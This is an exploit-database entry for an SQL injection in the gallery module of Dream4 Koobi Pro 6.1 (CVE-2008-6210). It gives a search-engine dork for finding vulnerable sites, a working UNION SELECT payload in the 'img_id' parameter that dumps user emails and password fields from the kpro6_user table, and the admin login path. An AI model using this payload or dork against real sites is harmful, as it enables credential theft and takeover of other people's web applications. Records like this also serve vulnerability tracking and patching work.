Dream4 Koobi Pro 6.1 Gallery - 'img_id' SQL Injection

Author: BILGE_KAGAN
type: webapps
platform: php
port: 
date_added: 2009-12-26  
date_updated: 2016-11-14  
verified: 1  
codes: CVE-2008-6210;OSVDB-52091  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10751.txt

##########################################
#
# Koobi Pro v6.1 gallery (img_id)
#

##########################################
#
##AUTHOR : BILGE_KAGAN
#
####HOME : http://www.1923turk.biz
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=gallerypic img_id"

###########################################
EXPLOiT:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+kpro6_user


aDM&#65533;N PANEL&#65533;:

admin/login.php